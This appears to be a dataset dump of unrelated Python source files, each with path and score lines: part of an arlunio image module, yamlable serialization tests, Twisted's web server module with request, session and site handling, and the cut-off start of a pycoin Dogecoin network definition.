:meth:`pillow:PIL.Image.Image.thumbnail` """ self.img.thumbnail(*args, **kwargs) def new(color) -> Image: """Creates a new image with the given background color.""" return ast.Node.builtin(name="image", color=color) def fromarray(*args, **kwargs): """Create an image from an array See :func:`pillow:PIL.Image.fromarray` """ return Image(PImage.fromarray(*args, **kwargs)) def load(*args, **kwargs) -> Image: """Load an image from the given file. See :func:`pillow:PIL.Image.open` """ return Image(PImage.open(*args, **kwargs)) def save(image: Image, filename: str, mkdirs: bool = False) -> None: """Save an image in PNG format. :param filename: The filepath to save the image to. :param mkdirs: If true, make any parent directories """ path = pathlib.Path(filename) if not path.parent.exists() and mkdirs: path.parent.mkdir(parents=True) with open(filename, "wb") as f: image.save(f) def encode(image: Image) -> bytes: """Return the image encoded as a base64 string. Parameters ---------- image: The image to encode. Example ------- :: >>> import arlunio.image as image >>> img = image.new((8, 8), color='red') >>> image.encode(img) b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg==' """ with io.BytesIO() as byte_stream: image.save(byte_stream, "PNG") image_bytes = byte_stream.getvalue() return base64.b64encode(image_bytes) def decode(bytestring: bytes) -> Image: """Decode the image represented by the given bytestring into an image object. Parameters ---------- bytestring: The bytestring to decode. 
Example ------- .. arlunio-image:: Decode Example :include-code: :: import arlunio.image as image bytestring = b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg==' # noqa: E501 img = image.decode(bytestring) """ data = base64.b64decode(bytestring) bytes_ = io.BytesIO(data) return Image(load(bytes_)) def colorramp(values, start: Optional[str] = None, stop: Optional[str] = None) -> Image: """Given a 2d array of values, produce an image gradient based on them. .. arlunio-image:: Colorramp Demo :align: right :: import arlunio.image as image import arlunio.math as math import numpy as np cartesian = math.Cartesian() p = cartesian(width=256, height=256) x, y = p[:, :, 0], p[:, :, 1] values = np.sin(2*x*np.pi) * np.sin(2*y* np.pi) img = image.colorramp(values) First this function will scale the input array so that all values fall in the range :math:`[0, 1]`. It will then produce an image with the same dimensions as the original array. The color of each pixel will be chosen based on the corresponding value of the scaled array. - If the value is :math:`0` the color will be given by the :code:`start` parameter - If the value is :math:`1` the color will be given by the :code:`stop` parameter - Otherwise the color will be some mix between the two. Parameters ---------- values: The array of values used to decide on the color. start: The color to use for values near :math:`0` (default, :code:`black`) stop: The color to use for values near :math:`1` (default, :code:`white`) Examples -------- .. arlunio-image:: Colorramp Demo 2 :include-code: :: import arlunio.image as image import arlunio.math as math import numpy as np cartesian = math.Cartesian() p = cartesian(width=256, height=256) x = image.colorramp(p[:, :, 0], start="#0000", stop="#f007") y = image.colorramp(p[:, :, 1], start="#0000", stop="#00f7") img = x + y """ # Scale all the values so that they fall into the range [0, 1] minx = np.min(values) vs = np.array(values) - minx vs = vs / np.max(vs) if start is None: start = "black" if stop is None: stop = "white" start = color.getcolor(start, "RGBA") stop = color.getcolor(stop, "RGBA") funcs = [math.lerp(a, b) for a, b in zip(start, stop)] channels = [np.floor(func(vs)) for func in funcs] pixels = np.array(np.dstack(channels), dtype=np.uint8) return fromarray(pixels) def fill( region, foreground: Optional[str] = None, background: Optional[str] = None, image: Optional[Image] = None, ) -> Image: """Apply color to an image, as specified by a mask. Parameters ---------- mask: The mask that selects the region to be coloured foreground: A string representation of the color to use, this can be in any format that is supported by the :mod:`pillow:PIL.ImageColor` module. If omitted this will default to black. background: In the case where an existing image is not provided this parameter can be used to set the background color of the generated image. This can be any string that is accepted by the :mod:`pillow:PIL.ImageColor` module. If omitted this will default to transparent image: The image to color in, if omitted a blank image will be used. Example -------- .. 
arlunio-image:: Fill Demo :include-code: :: import arlunio.image as image import arlunio.shape as shape circle = shape.Circle(x0=-0.5, y0=0.25, r=0.6) img = image.fill(circle(width=512, height=256), foreground='red') circle.x0, circle.y0 = 0, 0 img = image.fill(circle(width=512, height=256), foreground='#0f0', image=img) circle.x0, circle.y0 = 0.5, -0.25 img = image.fill(circle(width=512, height=256), foreground='blue', image=img) """ foreground = "#000" if foreground is None else foreground fill_color = color.getcolor(foreground, "RGBA") if image is None: background = "#0000" if background is None else background image = new(color=background) if not isinstance(region, ast.Node): region = region() return ast.Node.fill(image, region, fill_color)
2.265625
2
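The encode/decode pair defined above is a lossless round trip over PNG bytes; a sketch, assuming the arlunio.image module from this record is importable as written:

import numpy as np
import arlunio.image as image

pixels = np.zeros((8, 8, 4), dtype=np.uint8)
pixels[..., 0] = 255   # red channel
pixels[..., 3] = 255   # fully opaque
img = image.fromarray(pixels, "RGBA")

# PNG is lossless, so the decoded image compares equal pixel-wise
assert image.decode(image.encode(img)) == img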
yamlable/tests/test_yamlable.py
smarie/python-yamlable
27
1851
from copy import copy try: # Python 2 only: from StringIO import StringIO # create a variant that can serve as a context manager class StringIO(StringIO): def __enter__(self): return self def __exit__(self, exception_type, exception_value, traceback): self.close() except ImportError: from io import StringIO try: # python 3.5+ from typing import Dict, Any from yamlable import Y except ImportError: pass import pytest from yaml import dump, load from yamlable import YamlAble, yaml_info def test_yamlable_incomplete_description(): """ Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """ with pytest.raises(NotImplementedError) as err_info: class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo() # dump f.dumps_yaml() assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value) def test_yamlable(): """ Tests that YamlAble works correctly """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.Foo a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == Foo.loads_yaml(y) # load io assert f == Foo.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) def test_yamlable_legacy_method_names(): """ Tests that YamlAbleMixIn works correctly """ global enc global dec enc, dec = False, False @yaml_info(yaml_tag_ns='yaml.tests') class FooLegacy(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def to_yaml_dict(self): # type: (...) -> Dict[str, Any] global enc enc = True return copy(vars(self)) @classmethod def from_yaml_dict(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) 
-> Y global dec dec = True return FooLegacy(**dct) # instantiate f = FooLegacy(1, 'hello') # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooLegacy a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooLegacy.loads_yaml(y) # load io assert f == FooLegacy.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) assert enc assert dec # TODO override so that tag is not supported, to check error message def test_yamlable_not_supported(): @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Err(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo_Err(**dct) @classmethod def is_yaml_tag_supported(cls, yaml_tag # type: str ): # type: (...) -> bool # ALWAYS return false return False with pytest.raises(TypeError) as err_info: Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n") assert "No YamlAble subclass found able to decode object" in str(err_info.value) def test_yamlable_default_impl(): """ tests that the default implementation works """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Default(YamlAble): def __init__(self, a, b): self.a = a self.b = b f = Foo_Default(1, 'hello') s = """!yamlable/yaml.tests.Foo_Default a: 1 b: hello """ assert dump(f, default_flow_style=False) == s assert dump(load(dump(load(s))), default_flow_style=False) == s def test_help_yaml_info(): @yaml_info("com.example.MyFoo") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo" @yaml_info(yaml_tag_ns="com.example") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.Foo" assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {} """ def test_abstract_parent_error(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooE(YamlAble): pass class FooError(AbstractFooE): """ This class inherits from the parent without redefining a yaml tag """ def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate e = FooError(1, 'hello') # dump with pytest.raises(NotImplementedError): e.dumps_yaml() def test_abstract_parent(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooV(YamlAble): pass @yaml_info(yaml_tag_ns='yaml.tests') class FooValid(AbstractFooV): def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate f = FooValid(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooValid a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the 
standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooValid.loads_yaml(y) # load io assert f == FooValid.load_yaml(StringIO(y)) # load pyyaml assert f == load(y)
2.203125
2
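The default-implementation test above implies the minimal way to use the library: inherit YamlAble, attach a tag with @yaml_info, and rely on the default dict round trip. A sketch, assuming yamlable is installed; the Point class is illustrative:

from yamlable import YamlAble, yaml_info

@yaml_info(yaml_tag_ns="yaml.tests")
class Point(YamlAble):
    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y

p = Point(1, 2)
dumped = p.dumps_yaml()              # a YAML doc tagged !yamlable/yaml.tests.Point
restored = Point.loads_yaml(dumped)  # rebuilt via the default dict constructor
assert vars(restored) == vars(p)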
src/twisted/web/server.py
vmario/twisted
0
1852
# -*- test-case-name: twisted.web.test.test_web -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This is a web server which integrates with the twisted.internet infrastructure. @var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render} implementations can return to indicate that the application will later call C{.write} and C{.finish} to complete the request, and that the HTTP connection should be left open. @type NOT_DONE_YET: Opaque; do not depend on any particular type for this value. """ import copy import os import re from html import escape from typing import List, Optional from urllib.parse import quote as _quote import zlib from binascii import hexlify from zope.interface import implementer from twisted.python.compat import networkString, nativeString from twisted.spread.pb import Copyable, ViewPoint from twisted.internet import address, interfaces from twisted.internet.error import AlreadyCalled, AlreadyCancelled from twisted.web import iweb, http, util from twisted.web.http import unquote from twisted.python import reflect, failure, components from twisted import copyright from twisted.web import resource from twisted.web.error import UnsupportedMethod from incremental import Version from twisted.python.deprecate import deprecatedModuleAttribute from twisted.logger import Logger NOT_DONE_YET = 1 __all__ = [ "supportedMethods", "Request", "Session", "Site", "version", "NOT_DONE_YET", "GzipEncoderFactory", ] # backwards compatibility deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.datetimeToString instead", "twisted.web.server", "date_time_string", ) deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.stringToDatetime instead", "twisted.web.server", "string_date_time", ) date_time_string = http.datetimeToString string_date_time = http.stringToDatetime # Support for other methods may be implemented on a per-resource basis. supportedMethods = (b"GET", b"HEAD", b"POST") def quote(string, *args, **kwargs): return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap") def _addressToTuple(addr): if isinstance(addr, address.IPv4Address): return ("INET", addr.host, addr.port) elif isinstance(addr, address.UNIXAddress): return ("UNIX", addr.name) else: return tuple(addr) @implementer(iweb.IRequest) class Request(Copyable, http.Request, components.Componentized): """ An HTTP request. @ivar defaultContentType: A L{bytes} giving the default I{Content-Type} value to send in responses if no other value is set. L{None} disables the default. @ivar _insecureSession: The L{Session} object representing state that will be transmitted over plain-text HTTP. @ivar _secureSession: The L{Session} object representing the state that will be transmitted only over HTTPS. 
""" defaultContentType = b"text/html" site = None appRootURL = None prepath: Optional[List[bytes]] = None postpath: Optional[List[bytes]] = None __pychecker__ = "unusednames=issuer" _inFakeHead = False _encoder = None _log = Logger() def __init__(self, *args, **kw): http.Request.__init__(self, *args, **kw) components.Componentized.__init__(self) def getStateToCopyFor(self, issuer): x = self.__dict__.copy() del x["transport"] # XXX refactor this attribute out; it's from protocol # del x['server'] del x["channel"] del x["content"] del x["site"] self.content.seek(0, 0) x["content_data"] = self.content.read() x["remote"] = ViewPoint(issuer, self) # Address objects aren't jellyable x["host"] = _addressToTuple(x["host"]) x["client"] = _addressToTuple(x["client"]) # Header objects also aren't jellyable. x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders()) return x # HTML generation helpers def sibLink(self, name): """ Return the text that links to a sibling of the requested resource. @param name: The sibling resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ if self.postpath: return (len(self.postpath) * b"../") + name else: return name def childLink(self, name): """ Return the text that links to a child of the requested resource. @param name: The child resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ lpp = len(self.postpath) if lpp > 1: return ((lpp - 1) * b"../") + name elif lpp == 1: return name else: # lpp == 0 if len(self.prepath) and self.prepath[-1]: return self.prepath[-1] + b"/" + name else: return name def gotLength(self, length): """ Called when HTTP channel got length of content in this request. This method is not intended for users. @param length: The length of the request body, as indicated by the request headers. L{None} if the request headers do not indicate a length. """ try: getContentFile = self.channel.site.getContentFile except AttributeError: http.Request.gotLength(self, length) else: self.content = getContentFile(length) def process(self): """ Process a request. Find the addressed resource in this request's L{Site}, and call L{self.render()<Request.render()>} with it. @see: L{Site.getResourceFor()} """ # get site from channel self.site = self.channel.site # set various default headers self.setHeader(b"server", version) self.setHeader(b"date", http.datetimeToString()) # Resource Identification self.prepath = [] self.postpath = list(map(unquote, self.path[1:].split(b"/"))) # Short-circuit for requests whose path is '*'. if self.path == b"*": self._handleStar() return try: resrc = self.site.getResourceFor(self) if resource._IEncodingResource.providedBy(resrc): encoder = resrc.getEncoder(self) if encoder is not None: self._encoder = encoder self.render(resrc) except BaseException: self.processingFailed(failure.Failure()) def write(self, data): """ Write data to the transport (if not responding to a HEAD request). @param data: A string to write to the response. @type data: L{bytes} """ if not self.startedWriting: # Before doing the first write, check to see if a default # Content-Type header should be supplied. We omit it on # NOT_MODIFIED and NO_CONTENT responses. We also omit it if there # is a Content-Length header set to 0, as empty bodies don't need # a content-type. 
needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT) contentType = self.responseHeaders.getRawHeaders(b"content-type") contentLength = self.responseHeaders.getRawHeaders(b"content-length") contentLengthZero = contentLength and (contentLength[0] == b"0") if ( needsCT and contentType is None and self.defaultContentType is not None and not contentLengthZero ): self.responseHeaders.setRawHeaders( b"content-type", [self.defaultContentType] ) # Only let the write happen if we're not generating a HEAD response by # faking out the request method. Note, if we are doing that, # startedWriting will never be true, and the above logic may run # multiple times. It will only actually change the responseHeaders # once though, so it's still okay. if not self._inFakeHead: if self._encoder: data = self._encoder.encode(data) http.Request.write(self, data) def finish(self): """ Override C{http.Request.finish} for possible encoding. """ if self._encoder: data = self._encoder.finish() if data: http.Request.write(self, data) return http.Request.finish(self) def render(self, resrc): """ Ask a resource to render itself. If the resource does not support the requested method, generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response. @param resrc: The resource to render. @type resrc: L{twisted.web.resource.IResource} @see: L{IResource.render()<twisted.web.resource.IResource.render()>} """ try: body = resrc.render(self) except UnsupportedMethod as e: allowedMethods = e.allowedMethods if (self.method == b"HEAD") and (b"GET" in allowedMethods): # We must support HEAD (RFC 2616, 5.1.1). If the # resource doesn't, fake it by giving the resource # a 'GET' request and then return only the headers, # not the body. self._log.info( "Using GET to fake a HEAD request for {resrc}", resrc=resrc ) self.method = b"GET" self._inFakeHead = True body = resrc.render(self) if body is NOT_DONE_YET: self._log.info( "Tried to fake a HEAD request for {resrc}, but " "it got away from me.", resrc=resrc, ) # Oh well, I guess we won't include the content length. else: self.setHeader(b"content-length", b"%d" % (len(body),)) self._inFakeHead = False self.method = b"HEAD" self.write(b"") self.finish() return if self.method in (supportedMethods): # We MUST include an Allow header # (RFC 2616, 10.4.6 and 14.7) self.setHeader(b"Allow", b", ".join(allowedMethods)) s = ( """Your browser approached me (at %(URI)s) with""" """ the method "%(method)s". I only allow""" """ the method%(plural)s %(allowed)s here.""" % { "URI": escape(nativeString(self.uri)), "method": nativeString(self.method), "plural": ((len(allowedMethods) > 1) and "s") or "", "allowed": ", ".join([nativeString(x) for x in allowedMethods]), } ) epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s) body = epage.render(self) else: epage = resource.ErrorPage( http.NOT_IMPLEMENTED, "Huh?", "I don't know how to treat a %s request." % (escape(self.method.decode("charmap")),), ) body = epage.render(self) # end except UnsupportedMethod if body is NOT_DONE_YET: return if not isinstance(body, bytes): body = resource.ErrorPage( http.INTERNAL_SERVER_ERROR, "Request did not return bytes", "Request: " + util._PRE(reflect.safe_repr(self)) + "<br />" + "Resource: " + util._PRE(reflect.safe_repr(resrc)) + "<br />" + "Value: " + util._PRE(reflect.safe_repr(body)), ).render(self) if self.method == b"HEAD": if len(body) > 0: # This is a Bad Thing (RFC 2616, 9.4) self._log.info( "Warning: HEAD request {slf} for resource {resrc} is" " returning a message body. 
I think I'll eat it.", slf=self, resrc=resrc, ) self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(b"") else: self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() def processingFailed(self, reason): """ Finish this request with an indication that processing failed and possibly display a traceback. @param reason: Reason this request has failed. @type reason: L{twisted.python.failure.Failure} @return: The reason passed to this method. @rtype: L{twisted.python.failure.Failure} """ self._log.failure("", failure=reason) if self.site.displayTracebacks: body = ( b"<html><head><title>web.Server Traceback" b" (most recent call last)</title></head>" b"<body><b>web.Server Traceback" b" (most recent call last):</b>\n\n" + util.formatFailure(reason) + b"\n\n</body></html>\n" ) else: body = ( b"<html><head><title>Processing Failed" b"</title></head><body>" b"<b>Processing Failed</b></body></html>" ) self.setResponseCode(http.INTERNAL_SERVER_ERROR) self.setHeader(b"content-type", b"text/html") self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() return reason def view_write(self, issuer, data): """Remote version of write; same interface.""" self.write(data) def view_finish(self, issuer): """Remote version of finish; same interface.""" self.finish() def view_addCookie(self, issuer, k, v, **kwargs): """Remote version of addCookie; same interface.""" self.addCookie(k, v, **kwargs) def view_setHeader(self, issuer, k, v): """Remote version of setHeader; same interface.""" self.setHeader(k, v) def view_setLastModified(self, issuer, when): """Remote version of setLastModified; same interface.""" self.setLastModified(when) def view_setETag(self, issuer, tag): """Remote version of setETag; same interface.""" self.setETag(tag) def view_setResponseCode(self, issuer, code, message=None): """ Remote version of setResponseCode; same interface. """ self.setResponseCode(code, message) def view_registerProducer(self, issuer, producer, streaming): """Remote version of registerProducer; same interface. (requires a remote producer.) """ self.registerProducer(_RemoteProducerWrapper(producer), streaming) def view_unregisterProducer(self, issuer): self.unregisterProducer() ### these calls remain local _secureSession = None _insecureSession = None @property def session(self): """ If a session has already been created or looked up with L{Request.getSession}, this will return that object. (This will always be the session that matches the security of the request; so if C{forceNotSecure} is used on a secure request, this will not return that session.) @return: the session attribute @rtype: L{Session} or L{None} """ if self.isSecure(): return self._secureSession else: return self._insecureSession def getSession(self, sessionInterface=None, forceNotSecure=False): """ Check if there is a session cookie, and if not, create it. By default, the cookie with be secure for HTTPS requests and not secure for HTTP requests. If for some reason you need access to the insecure cookie from a secure request you can set C{forceNotSecure = True}. @param forceNotSecure: Should we retrieve a session that will be transmitted over HTTP, even if this L{Request} was delivered over HTTPS? 
@type forceNotSecure: L{bool} """ # Make sure we aren't creating a secure session on a non-secure page secure = self.isSecure() and not forceNotSecure if not secure: cookieString = b"TWISTED_SESSION" sessionAttribute = "_insecureSession" else: cookieString = b"TWISTED_SECURE_SESSION" sessionAttribute = "_secureSession" session = getattr(self, sessionAttribute) if session is not None: # We have a previously created session. try: # Refresh the session, to keep it alive. session.touch() except (AlreadyCalled, AlreadyCancelled): # Session has already expired. session = None if session is None: # No session was created yet for this request. cookiename = b"_".join([cookieString] + self.sitepath) sessionCookie = self.getCookie(cookiename) if sessionCookie: try: session = self.site.getSession(sessionCookie) except KeyError: pass # if it still hasn't been set, fix it up. if not session: session = self.site.makeSession() self.addCookie(cookiename, session.uid, path=b"/", secure=secure) setattr(self, sessionAttribute, session) if sessionInterface: return session.getComponent(sessionInterface) return session def _prePathURL(self, prepath): port = self.getHost().port if self.isSecure(): default = 443 else: default = 80 if port == default: hostport = "" else: hostport = ":%d" % port prefix = networkString( "http%s://%s%s/" % ( self.isSecure() and "s" or "", nativeString(self.getRequestHostname()), hostport, ) ) path = b"/".join([quote(segment, safe=b"") for segment in prepath]) return prefix + path def prePathURL(self): return self._prePathURL(self.prepath) def URLPath(self): from twisted.python import urlpath return urlpath.URLPath.fromRequest(self) def rememberRootURL(self): """ Remember the currently-processed part of the URL for later recalling. """ url = self._prePathURL(self.prepath[:-1]) self.appRootURL = url def getRootURL(self): """ Get a previously-remembered URL. @return: An absolute URL. @rtype: L{bytes} """ return self.appRootURL def _handleStar(self): """ Handle receiving a request whose path is '*'. RFC 7231 defines an OPTIONS * request as being something that a client can send as a low-effort way to probe server capabilities or readiness. Rather than bother the user with this, we simply fast-path it back to an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed telling the client they can only use OPTIONS. """ if self.method == b"OPTIONS": self.setResponseCode(http.OK) else: self.setResponseCode(http.NOT_ALLOWED) self.setHeader(b"Allow", b"OPTIONS") # RFC 7231 says we MUST set content-length 0 when responding to this # with no body. self.setHeader(b"Content-Length", b"0") self.finish() @implementer(iweb._IRequestEncoderFactory) class GzipEncoderFactory: """ @cvar compressLevel: The compression level used by the compressor, default to 9 (highest). @since: 12.3 """ _gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])") compressLevel = 9 def encoderForRequest(self, request): """ Check the headers if the client accepts gzip encoding, and encodes the request if so. """ acceptHeaders = b",".join( request.requestHeaders.getRawHeaders(b"accept-encoding", []) ) if self._gzipCheckRegex.search(acceptHeaders): encoding = request.responseHeaders.getRawHeaders(b"content-encoding") if encoding: encoding = b",".join(encoding + [b"gzip"]) else: encoding = b"gzip" request.responseHeaders.setRawHeaders(b"content-encoding", [encoding]) return _GzipEncoder(self.compressLevel, request) @implementer(iweb._IRequestEncoder) class _GzipEncoder: """ An encoder which supports gzip. 
@ivar _zlibCompressor: The zlib compressor instance used to compress the stream. @ivar _request: A reference to the originating request. @since: 12.3 """ _zlibCompressor = None def __init__(self, compressLevel, request): self._zlibCompressor = zlib.compressobj( compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS ) self._request = request def encode(self, data): """ Write to the request, automatically compressing data on the fly. """ if not self._request.startedWriting: # Remove the content-length header, we can't honor it # because we compress on the fly. self._request.responseHeaders.removeHeader(b"content-length") return self._zlibCompressor.compress(data) def finish(self): """ Finish handling the request request, flushing any data from the zlib buffer. """ remain = self._zlibCompressor.flush() self._zlibCompressor = None return remain class _RemoteProducerWrapper: def __init__(self, remote): self.resumeProducing = remote.remoteMethod("resumeProducing") self.pauseProducing = remote.remoteMethod("pauseProducing") self.stopProducing = remote.remoteMethod("stopProducing") class Session(components.Componentized): """ A user's session with a system. This utility class contains no functionality, but is used to represent a session. @ivar site: The L{Site} that generated the session. @type site: L{Site} @ivar uid: A unique identifier for the session. @type uid: L{bytes} @ivar _reactor: An object providing L{IReactorTime} to use for scheduling expiration. @ivar sessionTimeout: Time after last modification the session will expire, in seconds. @type sessionTimeout: L{float} @ivar lastModified: Time the C{touch()} method was last called (or time the session was created). A UNIX timestamp as returned by L{IReactorTime.seconds()}. @type lastModified: L{float} """ sessionTimeout = 900 _expireCall = None def __init__(self, site, uid, reactor=None): """ Initialize a session with a unique ID for that session. @param reactor: L{IReactorTime} used to schedule expiration of the session. If C{None}, the reactor associated with I{site} is used. """ super().__init__() if reactor is None: reactor = site.reactor self._reactor = reactor self.site = site self.uid = uid self.expireCallbacks = [] self.touch() self.sessionNamespaces = {} def startCheckingExpiration(self): """ Start expiration tracking. @return: L{None} """ self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire) def notifyOnExpire(self, callback): """ Call this callback when the session expires or logs out. """ self.expireCallbacks.append(callback) def expire(self): """ Expire/logout of the session. """ del self.site.sessions[self.uid] for c in self.expireCallbacks: c() self.expireCallbacks = [] if self._expireCall and self._expireCall.active(): self._expireCall.cancel() # Break reference cycle. self._expireCall = None def touch(self): """ Mark the session as modified, which resets expiration timer. """ self.lastModified = self._reactor.seconds() if self._expireCall is not None: self._expireCall.reset(self.sessionTimeout) version = networkString(f"TwistedWeb/{copyright.version}") @implementer(interfaces.IProtocolNegotiationFactory) class Site(http.HTTPFactory): """ A web site: manage log, sessions, and resources. @ivar requestFactory: A factory which is called with (channel) and creates L{Request} instances. Default to L{Request}. @ivar displayTracebacks: If set, unhandled exceptions raised during rendering are returned to the client as HTML. Default to C{False}. @ivar sessionFactory: factory for sessions objects. 
Default to L{Session}. @ivar sessions: Mapping of session IDs to objects returned by C{sessionFactory}. @type sessions: L{dict} mapping L{bytes} to L{Session} given the default C{sessionFactory} @ivar counter: The number of sessions that have been generated. @type counter: L{int} @ivar sessionCheckTime: Deprecated and unused. See L{Session.sessionTimeout} instead. """ counter = 0 requestFactory = Request displayTracebacks = False sessionFactory = Session sessionCheckTime = 1800 _entropy = os.urandom def __init__(self, resource, requestFactory=None, *args, **kwargs): """ @param resource: The root of the resource hierarchy. All request traversal for requests received by this factory will begin at this resource. @type resource: L{IResource} provider @param requestFactory: Overwrite for default requestFactory. @type requestFactory: C{callable} or C{class}. @see: L{twisted.web.http.HTTPFactory.__init__} """ super().__init__(*args, **kwargs) self.sessions = {} self.resource = resource if requestFactory is not None: self.requestFactory = requestFactory def _openLogFile(self, path): from twisted.python import logfile return logfile.LogFile(os.path.basename(path), os.path.dirname(path)) def __getstate__(self): d = self.__dict__.copy() d["sessions"] = {} return d def _mkuid(self): """ (internal) Generate an opaque, unique ID for a user's session. """ self.counter = self.counter + 1 return hexlify(self._entropy(32)) def makeSession(self): """ Generate a new Session instance, and store it for future reference. """ uid = self._mkuid() session = self.sessions[uid] = self.sessionFactory(self, uid) session.startCheckingExpiration() return session def getSession(self, uid): """ Get a previously generated session. @param uid: Unique ID of the session. @type uid: L{bytes}. @raise KeyError: If the session is not found. """ return self.sessions[uid] def buildProtocol(self, addr): """ Generate a channel attached to this site. """ channel = super().buildProtocol(addr) channel.requestFactory = self.requestFactory channel.site = self return channel isLeaf = 0 def render(self, request): """ Redirect because a Site is always a directory. """ request.redirect(request.prePathURL() + b"/") request.finish() def getChildWithDefault(self, pathEl, request): """ Emulate a resource's getChild method. """ request.site = self return self.resource.getChildWithDefault(pathEl, request) def getResourceFor(self, request): """ Get a resource for a request. This iterates through the resource hierarchy, calling getChildWithDefault on each resource it finds for a path element, stopping when it hits an element where isLeaf is true. """ request.site = self # Sitepath is used to determine cookie names between distributed # servers and disconnected sites. request.sitepath = copy.copy(request.prepath) return resource.getChildForRequest(self.resource, request) # IProtocolNegotiationFactory def acceptableProtocols(self): """ Protocols this server can speak. """ baseProtocols = [b"http/1.1"] if http.H2_ENABLED: baseProtocols.insert(0, b"h2") return baseProtocols
2.203125
2
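A minimal sketch of putting Site to work, following the standard twisted.web pattern (the port and resource are illustrative):

from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site

class Hello(Resource):
    isLeaf = True

    def render_GET(self, request):
        return b"hello"

# Site wires each incoming HTTP request to a Request, resolves it against
# the resource tree, and manages sessions.
reactor.listenTCP(8080, Site(Hello()))
reactor.run()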
pycoin/symbols/doge.py
jaschadub/pycoin
1
1853
from pycoin.networks.bitcoinish import create_bitcoinish_network

network = create_bitcoinish_network(
    symbol="DOGE", network_name="Dogecoin", subnet_name="mainnet",
